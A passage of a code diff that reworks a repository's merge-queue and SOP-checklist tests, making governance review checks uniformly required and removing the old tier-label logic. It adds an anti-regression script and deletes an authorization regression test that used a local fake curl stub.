port = int(sys.argv[1])
|
||||
srv = http.server.ThreadingHTTPServer(("127.0.0.1", port), Handler)
|
||||
srv.serve_forever()
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
main()
|
||||
@@ -107,6 +107,36 @@ def test_required_checks_env_json_malformed_fails():
|
||||
raise AssertionError("expected SystemExit(3)")
|
||||
|
||||
|
||||
def test_required_checks_env_json_non_string_item_fails():
|
||||
doc = _make_audit_doc_json({"main": ["ctx-a", 123, "ctx-b"]})
|
||||
try:
|
||||
drift.required_checks_env(doc, "main")
|
||||
except SystemExit as exc:
|
||||
assert exc.code == 3
|
||||
else:
|
||||
raise AssertionError("expected SystemExit(3)")
|
||||
|
||||
|
||||
def test_required_checks_env_json_empty_string_item_fails():
|
||||
doc = _make_audit_doc_json({"main": ["ctx-a", " ", "ctx-b"]})
|
||||
try:
|
||||
drift.required_checks_env(doc, "main")
|
||||
except SystemExit as exc:
|
||||
assert exc.code == 3
|
||||
else:
|
||||
raise AssertionError("expected SystemExit(3)")
|
||||
|
||||
|
||||
def test_required_checks_env_json_duplicate_context_fails():
|
||||
doc = _make_audit_doc_json({"main": ["ctx-a", "ctx-b", "ctx-a"]})
|
||||
try:
|
||||
drift.required_checks_env(doc, "main")
|
||||
except SystemExit as exc:
|
||||
assert exc.code == 3
|
||||
else:
|
||||
raise AssertionError("expected SystemExit(3)")
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# sentinel_needs
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
@@ -46,12 +46,12 @@ def test_required_contexts_green_rejects_missing_and_pending():
|
||||
]
|
||||
|
||||
|
||||
def test_required_contexts_green_rejects_volume_skipped_even_for_tier_low():
|
||||
def test_required_contexts_green_rejects_volume_skipped():
|
||||
"""volume-skipped pending is a partial view, not a genuine soft-fail.
|
||||
|
||||
Per sop-checklist.py:1179-1187, volume_skipped posts pending with a
|
||||
'[volume-skipped]' prefix. The merge queue must NOT treat this as an
|
||||
acceptable soft-fail for tier:low — the gate did not finish evaluating.
|
||||
acceptable soft-fail — the gate did not finish evaluating.
|
||||
"""
|
||||
latest = mq.latest_statuses_by_context([
|
||||
{"context": "CI / all-required (pull_request)", "status": "success"},
|
||||
@@ -68,7 +68,6 @@ def test_required_contexts_green_rejects_volume_skipped_even_for_tier_low():
|
||||
"CI / all-required (pull_request)",
|
||||
"sop-checklist / all-items-acked (pull_request)",
|
||||
],
|
||||
pr_labels={"tier:low"},
|
||||
)
|
||||
|
||||
assert ok is False
|
||||
@@ -114,7 +113,13 @@ def test_pr_needs_update_when_base_sha_absent_from_commits():
|
||||
|
||||
|
||||
def _ready_kwargs(**overrides):
|
||||
"""Default kwargs for a fully-ready merge; override per test."""
|
||||
"""Default kwargs for a fully-ready merge; override per test.
|
||||
|
||||
Includes the uniform governance checks (qa-review, security-review,
|
||||
sop-checklist) as required contexts and green statuses, matching the
|
||||
behaviour of process_once which merges GOVERNANCE_REQUIRED_CONTEXTS
|
||||
with branch-protection contexts.
|
||||
"""
|
||||
base = dict(
|
||||
main_status={
|
||||
"state": "success",
|
||||
@@ -122,9 +127,19 @@ def _ready_kwargs(**overrides):
|
||||
},
|
||||
pr_status={
|
||||
"state": "success",
|
||||
"statuses": [{"context": "CI / all-required (pull_request)", "status": "success"}],
|
||||
"statuses": [
|
||||
{"context": "CI / all-required (pull_request)", "status": "success"},
|
||||
{"context": "qa-review / approved (pull_request)", "status": "success"},
|
||||
{"context": "security-review / approved (pull_request)", "status": "success"},
|
||||
{"context": "sop-checklist / all-items-acked (pull_request)", "status": "success"},
|
||||
],
|
||||
},
|
||||
required_contexts=["CI / all-required (pull_request)"],
|
||||
required_contexts=[
|
||||
"CI / all-required (pull_request)",
|
||||
"qa-review / approved (pull_request)",
|
||||
"security-review / approved (pull_request)",
|
||||
"sop-checklist / all-items-acked (pull_request)",
|
||||
],
|
||||
required_approvals=2,
|
||||
approvers={"agent-reviewer-cr2", "agent-researcher"},
|
||||
request_changes=[],
|
||||
@@ -299,16 +314,35 @@ def test_merge_blocked_when_insufficient_genuine_approvals():
|
||||
assert "insufficient genuine approvals" in decision.reason
|
||||
|
||||
|
||||
def test_non_required_red_does_not_block_merge():
|
||||
# Required (CI) green; non-required governance reds present → still merge,
|
||||
# and force is set so force_merge bypasses ONLY those non-required reds.
|
||||
def test_governance_red_blocks_merge():
|
||||
# Uniform gate: qa-review, security-review, sop-checklist are ALWAYS
|
||||
# required. If any of them fail/pending, the PR is blocked.
|
||||
pr_status = {
|
||||
"state": "failure", # combined polluted by non-required reds
|
||||
"state": "failure",
|
||||
"statuses": [
|
||||
{"context": "CI / all-required (pull_request)", "status": "success"},
|
||||
{"context": "qa-review / approved (pull_request)", "status": "failure"},
|
||||
{"context": "security-review / approved (pull_request)", "status": "pending"},
|
||||
{"context": "sop-tier-check / tier-check (pull_request)", "status": "failure"},
|
||||
{"context": "sop-checklist / all-items-acked (pull_request)", "status": "failure"},
|
||||
{"context": "Staging SaaS / e2e (pull_request)", "status": "failure"},
|
||||
],
|
||||
}
|
||||
decision = mq.evaluate_merge_readiness(**_ready_kwargs(pr_status=pr_status))
|
||||
assert decision.ready is False
|
||||
assert decision.action == "wait"
|
||||
assert "required contexts not green" in decision.reason
|
||||
|
||||
|
||||
def test_non_required_advisory_red_does_not_block_merge():
|
||||
# Governance checks are green; only advisory non-required reds (Staging SaaS)
|
||||
# are present → PR is still mergeable with force_merge bypassing the advisory.
|
||||
pr_status = {
|
||||
"state": "failure", # combined polluted by advisory non-required reds
|
||||
"statuses": [
|
||||
{"context": "CI / all-required (pull_request)", "status": "success"},
|
||||
{"context": "qa-review / approved (pull_request)", "status": "success"},
|
||||
{"context": "security-review / approved (pull_request)", "status": "success"},
|
||||
{"context": "sop-checklist / all-items-acked (pull_request)", "status": "success"},
|
||||
{"context": "Staging SaaS / e2e (pull_request)", "status": "failure"},
|
||||
],
|
||||
}
|
||||
@@ -412,8 +446,14 @@ def test_process_once_holds_pr_on_permanent_merge_error(monkeypatch):
|
||||
monkeypatch.setattr(mq, "get_branch_head", lambda branch: main_sha)
|
||||
|
||||
def fake_combined(sha):
|
||||
ctx = "CI / all-required (push)" if sha == main_sha else "CI / all-required (pull_request)"
|
||||
return {"state": "success", "statuses": [{"context": ctx, "status": "success"}]}
|
||||
if sha == main_sha:
|
||||
return {"state": "success", "statuses": [{"context": "CI / all-required (push)", "status": "success"}]}
|
||||
return {"state": "success", "statuses": [
|
||||
{"context": "CI / all-required (pull_request)", "status": "success"},
|
||||
{"context": "qa-review / approved (pull_request)", "status": "success"},
|
||||
{"context": "security-review / approved (pull_request)", "status": "success"},
|
||||
{"context": "sop-checklist / all-items-acked (pull_request)", "status": "success"},
|
||||
]}
|
||||
monkeypatch.setattr(mq, "get_combined_status", fake_combined)
|
||||
|
||||
monkeypatch.setattr(mq, "list_candidate_issues", lambda *, auto_discover: [
|
||||
@@ -479,8 +519,14 @@ def _fully_ready_process_once_monkeypatch(monkeypatch, mergeable, calls):
|
||||
monkeypatch.setattr(mq, "get_branch_head", lambda branch: main_sha)
|
||||
|
||||
def fake_combined(sha):
|
||||
ctx = "CI / all-required (push)" if sha == main_sha else "CI / all-required (pull_request)"
|
||||
return {"state": "success", "statuses": [{"context": ctx, "status": "success"}]}
|
||||
if sha == main_sha:
|
||||
return {"state": "success", "statuses": [{"context": "CI / all-required (push)", "status": "success"}]}
|
||||
return {"state": "success", "statuses": [
|
||||
{"context": "CI / all-required (pull_request)", "status": "success"},
|
||||
{"context": "qa-review / approved (pull_request)", "status": "success"},
|
||||
{"context": "security-review / approved (pull_request)", "status": "success"},
|
||||
{"context": "sop-checklist / all-items-acked (pull_request)", "status": "success"},
|
||||
]}
|
||||
monkeypatch.setattr(mq, "get_combined_status", fake_combined)
|
||||
|
||||
monkeypatch.setattr(mq, "list_candidate_issues", lambda *, auto_discover: [
|
||||
@@ -884,8 +930,14 @@ def _stale_pr_update_409_monkeypatch(monkeypatch, queued_issues, calls):
|
||||
monkeypatch.setattr(mq, "get_branch_head", lambda branch: main_sha)
|
||||
|
||||
def fake_combined(sha):
|
||||
ctx = "CI / all-required (push)" if sha == main_sha else "CI / all-required (pull_request)"
|
||||
return {"state": "success", "statuses": [{"context": ctx, "status": "success"}]}
|
||||
if sha == main_sha:
|
||||
return {"state": "success", "statuses": [{"context": "CI / all-required (push)", "status": "success"}]}
|
||||
return {"state": "success", "statuses": [
|
||||
{"context": "CI / all-required (pull_request)", "status": "success"},
|
||||
{"context": "qa-review / approved (pull_request)", "status": "success"},
|
||||
{"context": "security-review / approved (pull_request)", "status": "success"},
|
||||
{"context": "sop-checklist / all-items-acked (pull_request)", "status": "success"},
|
||||
]}
|
||||
monkeypatch.setattr(mq, "get_combined_status", fake_combined)
|
||||
|
||||
# Scan-loop process_once enumerates candidates via list_candidate_issues.
|
||||
@@ -1153,8 +1205,16 @@ def _wire_ready_process_once(monkeypatch, *, issues, pr_payload, calls):
|
||||
monkeypatch.setattr(mq, "get_branch_head", lambda branch: main_sha)
|
||||
|
||||
def fake_combined(sha):
|
||||
ctx = "CI / all-required (push)" if sha == main_sha else "CI / all-required (pull_request)"
|
||||
return {"state": "success", "statuses": [{"context": ctx, "status": "success"}]}
|
||||
if sha == main_sha:
|
||||
return {"state": "success", "statuses": [
|
||||
{"context": "CI / all-required (push)", "status": "success"},
|
||||
]}
|
||||
return {"state": "success", "statuses": [
|
||||
{"context": "CI / all-required (pull_request)", "status": "success"},
|
||||
{"context": "qa-review / approved (pull_request)", "status": "success"},
|
||||
{"context": "security-review / approved (pull_request)", "status": "success"},
|
||||
{"context": "sop-checklist / all-items-acked (pull_request)", "status": "success"},
|
||||
]}
|
||||
monkeypatch.setattr(mq, "get_combined_status", fake_combined)
|
||||
monkeypatch.setattr(mq, "list_candidate_issues", lambda *, auto_discover: issues)
|
||||
monkeypatch.setattr(mq, "get_pull", lambda n: dict(pr_payload, number=n))
|
||||
@@ -1335,8 +1395,14 @@ def _wire_multi_candidate_process_once(monkeypatch, *, issues, pulls, reviews, c
|
||||
monkeypatch.setattr(mq, "get_branch_head", lambda branch: MAIN_SHA)
|
||||
|
||||
def fake_combined(sha):
|
||||
ctx = "CI / all-required (push)" if sha == MAIN_SHA else "CI / all-required (pull_request)"
|
||||
return {"state": "success", "statuses": [{"context": ctx, "status": "success"}]}
|
||||
if sha == MAIN_SHA:
|
||||
return {"state": "success", "statuses": [{"context": "CI / all-required (push)", "status": "success"}]}
|
||||
return {"state": "success", "statuses": [
|
||||
{"context": "CI / all-required (pull_request)", "status": "success"},
|
||||
{"context": "qa-review / approved (pull_request)", "status": "success"},
|
||||
{"context": "security-review / approved (pull_request)", "status": "success"},
|
||||
{"context": "sop-checklist / all-items-acked (pull_request)", "status": "success"},
|
||||
]}
|
||||
monkeypatch.setattr(mq, "get_combined_status", fake_combined)
|
||||
|
||||
monkeypatch.setattr(mq, "list_candidate_issues", lambda *, auto_discover: issues)
|
||||
@@ -1468,7 +1534,12 @@ def test_hol_unready_red_required_ci_is_skipped_for_ready_pr(monkeypatch):
|
||||
"statuses": [{"context": "CI / all-required (push)", "status": "success"}]}
|
||||
state = "failure" if sha == red_head else "success"
|
||||
return {"state": state,
|
||||
"statuses": [{"context": "CI / all-required (pull_request)", "status": state}]}
|
||||
"statuses": [
|
||||
{"context": "CI / all-required (pull_request)", "status": state},
|
||||
{"context": "qa-review / approved (pull_request)", "status": "success"},
|
||||
{"context": "security-review / approved (pull_request)", "status": "success"},
|
||||
{"context": "sop-checklist / all-items-acked (pull_request)", "status": "success"},
|
||||
]}
|
||||
monkeypatch.setattr(mq, "get_combined_status", fake_combined)
|
||||
|
||||
rc = mq.process_once(dry_run=False)
|
||||
@@ -1563,3 +1634,126 @@ def test_process_once_defensive_skip_when_pull_payload_opted_out(monkeypatch):
|
||||
|
||||
assert rc == 0
|
||||
assert calls["merged"] is None
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# readiness-enumeration + post-batch summary
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
def test_enumerate_readiness_evaluates_all_candidates(monkeypatch):
|
||||
"""enumerate_readiness returns every candidate's state, not stopping at
|
||||
the first actionable one."""
|
||||
old_head, new_head = "a" * 40, "c" * 40
|
||||
_wire_multi_candidate_process_once(
|
||||
monkeypatch,
|
||||
issues=[
|
||||
_issue(500, labels=[], created="2026-06-01T01:00:00Z"),
|
||||
_issue(501, labels=[], created="2026-06-01T02:00:00Z"),
|
||||
],
|
||||
pulls={
|
||||
500: {"state": "open", "mergeable": False, "draft": False,
|
||||
"base": {"ref": "main", "repo_id": 1},
|
||||
"head": {"sha": old_head, "repo_id": 1}, "labels": []},
|
||||
501: {"state": "open", "mergeable": True, "draft": False,
|
||||
"base": {"ref": "main", "repo_id": 1},
|
||||
"head": {"sha": new_head, "repo_id": 1}, "labels": []},
|
||||
},
|
||||
reviews={500: _two_approvals(old_head), 501: _two_approvals(new_head)},
|
||||
calls={},
|
||||
)
|
||||
|
||||
entries = mq.enumerate_readiness(dry_run=False)
|
||||
|
||||
assert len(entries) == 2
|
||||
by_num = {e.pr_number: e for e in entries}
|
||||
assert by_num[500].decision is not None
|
||||
assert by_num[500].decision.ready is False
|
||||
assert by_num[501].decision is not None
|
||||
assert by_num[501].decision.ready is True
|
||||
|
||||
|
||||
def test_enumerate_readiness_includes_ineligible_pr(monkeypatch):
|
||||
"""enumerate_readiness marks fork / wrong-base PRs as ineligible
|
||||
(decision=None) while still evaluating the rest."""
|
||||
head = "a" * 40
|
||||
_wire_multi_candidate_process_once(
|
||||
monkeypatch,
|
||||
issues=[
|
||||
_issue(600, labels=[], created="2026-06-01T01:00:00Z"),
|
||||
_issue(601, labels=[], created="2026-06-01T02:00:00Z"),
|
||||
],
|
||||
pulls={
|
||||
600: {"state": "open", "mergeable": True, "draft": False,
|
||||
"base": {"ref": "main", "repo_id": 1},
|
||||
"head": {"sha": head, "repo_id": 2}, "labels": []}, # fork
|
||||
601: {"state": "open", "mergeable": True, "draft": False,
|
||||
"base": {"ref": "main", "repo_id": 1},
|
||||
"head": {"sha": head, "repo_id": 1}, "labels": []},
|
||||
},
|
||||
reviews={600: _two_approvals(head), 601: _two_approvals(head)},
|
||||
calls={},
|
||||
)
|
||||
|
||||
entries = mq.enumerate_readiness(dry_run=False)
|
||||
|
||||
by_num = {e.pr_number: e for e in entries}
|
||||
assert by_num[600].decision is None
|
||||
assert "not merge-eligible" in by_num[600].reason
|
||||
assert by_num[601].decision is not None
|
||||
assert by_num[601].decision.ready is True
|
||||
|
||||
|
||||
def test_enumerate_readiness_fail_closed_on_api_error(monkeypatch):
|
||||
"""If get_pull raises for one candidate, that candidate is recorded as
|
||||
unverifiable; other candidates are still evaluated."""
|
||||
head = "a" * 40
|
||||
_wire_multi_candidate_process_once(
|
||||
monkeypatch,
|
||||
issues=[
|
||||
_issue(700, labels=[], created="2026-06-01T01:00:00Z"),
|
||||
_issue(701, labels=[], created="2026-06-01T02:00:00Z"),
|
||||
],
|
||||
pulls={
|
||||
700: {"state": "open", "mergeable": True, "draft": False,
|
||||
"base": {"ref": "main", "repo_id": 1},
|
||||
"head": {"sha": head, "repo_id": 1}, "labels": []},
|
||||
701: {"state": "open", "mergeable": True, "draft": False,
|
||||
"base": {"ref": "main", "repo_id": 1},
|
||||
"head": {"sha": head, "repo_id": 1}, "labels": []},
|
||||
},
|
||||
reviews={700: _two_approvals(head), 701: _two_approvals(head)},
|
||||
calls={},
|
||||
)
|
||||
|
||||
original_get_pull = mq.get_pull
|
||||
def failing_get_pull(n):
|
||||
if n == 700:
|
||||
raise mq.ApiError("simulated API failure")
|
||||
return original_get_pull(n)
|
||||
monkeypatch.setattr(mq, "get_pull", failing_get_pull)
|
||||
|
||||
entries = mq.enumerate_readiness(dry_run=False)
|
||||
|
||||
by_num = {e.pr_number: e for e in entries}
|
||||
assert by_num[700].decision is None
|
||||
assert "unverifiable" in by_num[700].reason
|
||||
assert by_num[701].decision is not None
|
||||
assert by_num[701].decision.ready is True
|
||||
|
||||
|
||||
def test_print_post_batch_summary_counts_correctly(capsys):
|
||||
entries = [
|
||||
mq.ReadinessEntry(pr_number=1, decision=mq.MergeDecision(True, "merge", "ready"), reason="ready"),
|
||||
mq.ReadinessEntry(pr_number=2, decision=mq.MergeDecision(False, "wait", "CI red"), reason="CI red"),
|
||||
mq.ReadinessEntry(pr_number=3, decision=None, reason="draft"),
|
||||
]
|
||||
mq.print_post_batch_summary(entries)
|
||||
captured = capsys.readouterr()
|
||||
out = captured.out
|
||||
assert "total_candidates=3" in out
|
||||
assert "ready=1" in out
|
||||
assert "waiting=1" in out
|
||||
assert "ineligible/unverifiable=1" in out
|
||||
assert "PR #1: state=ready" in out
|
||||
assert "PR #2: state=waiting" in out
|
||||
assert "PR #3: state=ineligible" in out
|
||||
|
||||
@@ -17,7 +17,7 @@ wd.REPO = "molecule-ai/molecule-core"
|
||||
wd.OWNER = "molecule-ai"
|
||||
wd.NAME = "molecule-core"
|
||||
wd.WATCH_BRANCH = "main"
|
||||
wd.RED_LABEL = "tier:high"
|
||||
wd.RED_LABEL = "ci-bp-drift"
|
||||
wd.API = "https://git.example.com/api/v1"
|
||||
|
||||
|
||||
|
||||
+48
@@ -0,0 +1,48 @@
|
||||
#!/usr/bin/env bash
|
||||
set -euo pipefail
|
||||
# Anti-regression gate for #2403: fail if any SOP tier artifact reappears.
|
||||
|
||||
cd "$(dirname "$0")/../../.."
|
||||
|
||||
fail=0
|
||||
|
||||
# 1. Deleted workflow files must stay deleted
|
||||
for f in .gitea/workflows/sop-tier-check.yml .gitea/workflows/sop-tier-refire.yml; do
|
||||
if [ -e "$f" ]; then
|
||||
echo "FAIL: $f was re-added (must stay deleted per #2403)" >&2
|
||||
fail=1
|
||||
fi
|
||||
done
|
||||
|
||||
# 2. Deleted script files must stay deleted
|
||||
for f in .gitea/scripts/sop-tier-check.sh .gitea/scripts/sop-tier-refire.sh; do
|
||||
if [ -e "$f" ]; then
|
||||
echo "FAIL: $f was re-added (must stay deleted per #2403)" >&2
|
||||
fail=1
|
||||
fi
|
||||
done
|
||||
|
||||
# 3. No tier branching logic in gate_check.py
|
||||
if grep -qE '_get_pr_tier|TIER_AGENTS' tools/gate-check-v3/gate_check.py; then
|
||||
echo "FAIL: tier branching reappeared in gate_check.py" >&2
|
||||
fail=1
|
||||
fi
|
||||
|
||||
# 4. No _is_tier_low_pending_ok in merge queue
|
||||
if grep -q '_is_tier_low_pending_ok' .gitea/scripts/gitea-merge-queue.py; then
|
||||
echo "FAIL: tier soft-fail reappeared in gitea-merge-queue.py" >&2
|
||||
fail=1
|
||||
fi
|
||||
|
||||
# 5. No sop-tier-check context references in workflow YAML
|
||||
if grep -r 'sop-tier-check' .gitea/workflows/; then
|
||||
echo "FAIL: sop-tier-check context reappeared in workflows" >&2
|
||||
fail=1
|
||||
fi
|
||||
|
||||
if [ "$fail" -eq 1 ]; then
|
||||
echo "TIER_REGRESSION_DETECTED" >&2
|
||||
exit 1
|
||||
fi
|
||||
|
||||
echo "PASS: no tier regression detected"
|
||||
@@ -11,7 +11,7 @@
|
||||
# - compute_ack_state (self-ack rejected, team probe applied, revoke
|
||||
# invalidates own prior ack, peer's ack survives unrevoked)
|
||||
# - render_status (state + description format)
|
||||
# - get_tier_mode (label-driven, default fallback)
|
||||
# - is_high_risk (label-driven, default fallback)
|
||||
# - load_config (default config parses cleanly with both PyYAML and
|
||||
# the bundled minimal parser)
|
||||
#
|
||||
@@ -432,37 +432,6 @@ class TestRenderStatus(unittest.TestCase):
|
||||
self.assertIn("body-unfilled", desc)
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# get_tier_mode
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
|
||||
class TestGetTierMode(unittest.TestCase):
|
||||
def setUp(self):
|
||||
self.cfg = sop.load_config(CONFIG_PATH)
|
||||
|
||||
def test_tier_high_is_hard(self):
|
||||
pr = {"labels": [{"name": "tier:high"}, {"name": "area:ci"}]}
|
||||
self.assertEqual(sop.get_tier_mode(pr, self.cfg), "hard")
|
||||
|
||||
def test_tier_medium_is_hard(self):
|
||||
pr = {"labels": [{"name": "tier:medium"}]}
|
||||
self.assertEqual(sop.get_tier_mode(pr, self.cfg), "hard")
|
||||
|
||||
def test_tier_low_is_soft(self):
|
||||
pr = {"labels": [{"name": "tier:low"}]}
|
||||
self.assertEqual(sop.get_tier_mode(pr, self.cfg), "soft")
|
||||
|
||||
def test_no_tier_label_defaults_to_hard(self):
|
||||
# Per feedback_fix_root_not_symptom — never silently lower the bar.
|
||||
pr = {"labels": [{"name": "area:ci"}]}
|
||||
self.assertEqual(sop.get_tier_mode(pr, self.cfg), "hard")
|
||||
|
||||
def test_no_labels_defaults_to_hard(self):
|
||||
self.assertEqual(sop.get_tier_mode({"labels": []}, self.cfg), "hard")
|
||||
self.assertEqual(sop.get_tier_mode({}, self.cfg), "hard")
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# load_config
|
||||
# ---------------------------------------------------------------------------
|
||||
@@ -487,13 +456,6 @@ class TestLoadConfig(unittest.TestCase):
|
||||
},
|
||||
)
|
||||
|
||||
def test_default_config_tier_mode_shape(self):
|
||||
cfg = sop.load_config(CONFIG_PATH)
|
||||
self.assertEqual(cfg["tier_failure_mode"]["tier:high"], "hard")
|
||||
self.assertEqual(cfg["tier_failure_mode"]["tier:medium"], "hard")
|
||||
self.assertEqual(cfg["tier_failure_mode"]["tier:low"], "soft")
|
||||
self.assertEqual(cfg["default_mode"], "hard")
|
||||
|
||||
def test_each_item_has_required_fields(self):
|
||||
cfg = sop.load_config(CONFIG_PATH)
|
||||
for it in cfg["items"]:
|
||||
@@ -627,7 +589,7 @@ class TestComputeNaState(unittest.TestCase):
|
||||
class TestIsHighRisk(unittest.TestCase):
|
||||
"""The high-risk predicate decides which required_teams list applies.
|
||||
|
||||
Predicate: tier:high label OR any label in cfg.high_risk_labels.
|
||||
Predicate: any label in cfg.high_risk_labels.
|
||||
"""
|
||||
|
||||
def setUp(self):
|
||||
@@ -637,23 +599,8 @@ class TestIsHighRisk(unittest.TestCase):
|
||||
pr = {"labels": []}
|
||||
self.assertFalse(sop.is_high_risk(pr, self.cfg))
|
||||
|
||||
def test_tier_high_is_high_risk(self):
|
||||
pr = {"labels": [{"name": "tier:high"}]}
|
||||
self.assertTrue(sop.is_high_risk(pr, self.cfg))
|
||||
|
||||
def test_tier_low_is_default_class(self):
|
||||
pr = {"labels": [{"name": "tier:low"}]}
|
||||
self.assertFalse(sop.is_high_risk(pr, self.cfg))
|
||||
|
||||
def test_tier_medium_is_default_class(self):
|
||||
# tier:medium alone is NOT high-risk (Option C — medium routes
|
||||
# to the wider engineers OR-set).
|
||||
pr = {"labels": [{"name": "tier:medium"}]}
|
||||
self.assertFalse(sop.is_high_risk(pr, self.cfg))
|
||||
|
||||
def test_area_security_label_is_high_risk(self):
|
||||
pr = {"labels": [{"name": "tier:medium"}, {"name": "area:security"}]}
|
||||
self.assertTrue(sop.is_high_risk(pr, self.cfg))
|
||||
pr = {"labels": [{"name": "area:security"}]}
|
||||
|
||||
def test_area_schema_label_is_high_risk(self):
|
||||
pr = {"labels": [{"name": "area:schema"}]}
|
||||
@@ -668,7 +615,7 @@ class TestIsHighRisk(unittest.TestCase):
|
||||
self.assertTrue(sop.is_high_risk(pr, self.cfg))
|
||||
|
||||
def test_area_gate_meta_label_is_high_risk(self):
|
||||
# Gate-meta = changes to sop-checklist/sop-tier-check itself.
|
||||
# Gate-meta = changes to sop-checklist/sop-checklist itself.
|
||||
pr = {"labels": [{"name": "area:gate-meta"}]}
|
||||
self.assertTrue(sop.is_high_risk(pr, self.cfg))
|
||||
|
||||
@@ -722,7 +669,7 @@ class TestRootCauseAckEligibilityWidened(unittest.TestCase):
|
||||
root-cause / no-backwards-compat for the default class.
|
||||
|
||||
The dead-managers/ceo-persona-token gridlock is the symptom; the
|
||||
root cause is that sop-checklist ignored tier-class. These tests
|
||||
root cause is that sop-checklist ignored high-risk class. These tests
|
||||
pin the new wider-default behavior so it can't regress silently.
|
||||
"""
|
||||
|
||||
@@ -793,7 +740,7 @@ class TestHighRiskClassUsesElevatedListInConfig(unittest.TestCase):
|
||||
|
||||
def test_root_cause_high_risk_elevated_to_ceo_only(self):
|
||||
items = _items_by_slug()
|
||||
# tier:high alone makes the PR high-risk → root-cause needs ceo.
|
||||
# area:schema alone makes the PR high-risk → root-cause needs ceo.
|
||||
self.assertEqual(
|
||||
sop.resolve_required_teams(items["root-cause"], high_risk=True),
|
||||
["ceo"],
|
||||
|
||||
@@ -1,272 +0,0 @@
|
||||
#!/usr/bin/env bash
|
||||
# Security regression test for the SOP tier-gate AUTHORIZATION bypass.
|
||||
#
|
||||
# Bug (fixed in fix/sop-tier-authz-no-org-fallback):
|
||||
# sop-tier-check.sh probed team membership at /teams/{id}/members/{user}.
|
||||
# If EVERY team probe failed (e.g. 403 — token lacks read:organization, or
|
||||
# any visibility/flakiness gap), it FELL BACK to /orgs/{org}/members/{user}
|
||||
# and credited that org member as a member of EVERY queried team. The
|
||||
# evaluator then treated those synthetic memberships as real, so a plain
|
||||
# NON-CEO org member satisfied tier:high (ceo). A visibility/auth gap became
|
||||
# a real highest-tier authorization PASS — privilege escalation.
|
||||
#
|
||||
# Fix (fail-closed authorization):
|
||||
# - The org-member ⇒ "member of all teams" fallback is REMOVED. Org
|
||||
# membership is never credited as team membership.
|
||||
# - A team probe that returns anything other than 200/204 (member) or 404
|
||||
# (verified non-member) is a CANNOT-VERIFY condition: the gate fails loud
|
||||
# (exit 1) with a cannot-verify status and never grants the tier.
|
||||
#
|
||||
# Method: this is a true end-to-end test. It prepends a fake `curl` to PATH
|
||||
# that serves canned Gitea API responses keyed by URL, then runs the REAL
|
||||
# sop-tier-check.sh. The fake exercises the genuine probe→credit→evaluate
|
||||
# path — no logic is re-implemented in the test.
|
||||
|
||||
set -euo pipefail
|
||||
|
||||
THIS_DIR="$(cd "$(dirname "$0")" && pwd)"
|
||||
SCRIPT_DIR="$(cd "$THIS_DIR/.." && pwd)"
|
||||
SCRIPT="$SCRIPT_DIR/sop-tier-check.sh"
|
||||
|
||||
command -v jq >/dev/null 2>&1 || { echo "::error::jq required but not found"; exit 1; }
|
||||
[ -f "$SCRIPT" ] || { echo "::error::sop-tier-check.sh not found at $SCRIPT — test must fail loudly if the script is absent"; exit 1; }
|
||||
|
||||
# sop-tier-check.sh uses `declare -A` (associative arrays), which require
|
||||
# bash >= 4. CI runners (Ubuntu) ship bash 5; macOS ships 3.2. Resolve a
|
||||
# bash >= 4 to run the script under.
|
||||
pick_bash() {
|
||||
local c
|
||||
for c in bash /opt/homebrew/bin/bash /usr/local/bin/bash /bin/bash; do
|
||||
local p; p="$(command -v "$c" 2>/dev/null || true)"
|
||||
[ -n "$p" ] || continue
|
||||
local maj; maj="$("$p" -c 'echo "${BASH_VERSINFO[0]}"' 2>/dev/null || echo 0)"
|
||||
if [ "${maj:-0}" -ge 4 ]; then echo "$p"; return 0; fi
|
||||
done
|
||||
return 1
|
||||
}
|
||||
BASH4="$(pick_bash)" || { echo "::error::need bash >= 4 to run sop-tier-check.sh (associative arrays); none found"; exit 1; }
|
||||
echo "using bash: $BASH4 ($("$BASH4" -c 'echo $BASH_VERSION'))"
|
||||
|
||||
PASS=0
|
||||
FAIL=0
|
||||
|
||||
assert_eq() {
|
||||
local label="$1" expected="$2" got="$3"
|
||||
if [ "$expected" = "$got" ]; then
|
||||
echo " PASS $label"
|
||||
PASS=$((PASS + 1))
|
||||
else
|
||||
echo " FAIL $label"
|
||||
echo " expected: <$expected>"
|
||||
echo " got: <$got>"
|
||||
FAIL=$((FAIL + 1))
|
||||
fi
|
||||
}
|
||||
|
||||
assert_contains() {
|
||||
local label="$1" haystack="$2" needle="$3"
|
||||
if printf '%s' "$haystack" | grep -qF -- "$needle"; then
|
||||
echo " PASS $label"
|
||||
PASS=$((PASS + 1))
|
||||
else
|
||||
echo " FAIL $label (missing substring: <$needle>)"
|
||||
FAIL=$((FAIL + 1))
|
||||
fi
|
||||
}
|
||||
|
||||
assert_not_contains() {
|
||||
local label="$1" haystack="$2" needle="$3"
|
||||
if printf '%s' "$haystack" | grep -qF -- "$needle"; then
|
||||
echo " FAIL $label (unexpected substring present: <$needle>)"
|
||||
FAIL=$((FAIL + 1))
|
||||
else
|
||||
echo " PASS $label"
|
||||
PASS=$((PASS + 1))
|
||||
fi
|
||||
}
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Fake-curl harness.
|
||||
#
|
||||
# The real script calls curl in two shapes:
|
||||
# (a) body capture: curl -sS -H AUTH URL -> prints JSON body
|
||||
# (b) http-code: curl -sS -o FILE -w '%{http_code}' -H AUTH URL
|
||||
# (c) http-code only: curl -sS -o /dev/null -w '%{http_code}' -H AUTH URL
|
||||
#
|
||||
# Our fake reads the URL (last non-flag arg), looks up a response in fixture
|
||||
# files under $FIXDIR, and emits body and/or http-code accordingly.
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
make_harness() {
|
||||
# $1 = scenario dir to populate with fixtures
|
||||
local FIXDIR="$1"
|
||||
local BIN="$FIXDIR/bin"
|
||||
mkdir -p "$BIN"
|
||||
cat > "$BIN/curl" <<'FAKE'
|
||||
#!/usr/bin/env bash
|
||||
# Fake curl for sop-tier-check authz tests. Looks up canned responses by URL.
|
||||
set -u
|
||||
FIXDIR="${SOP_TEST_FIXDIR:?SOP_TEST_FIXDIR unset}"
|
||||
|
||||
url=""
|
||||
out=""
|
||||
want_code="no"
|
||||
prev=""
|
||||
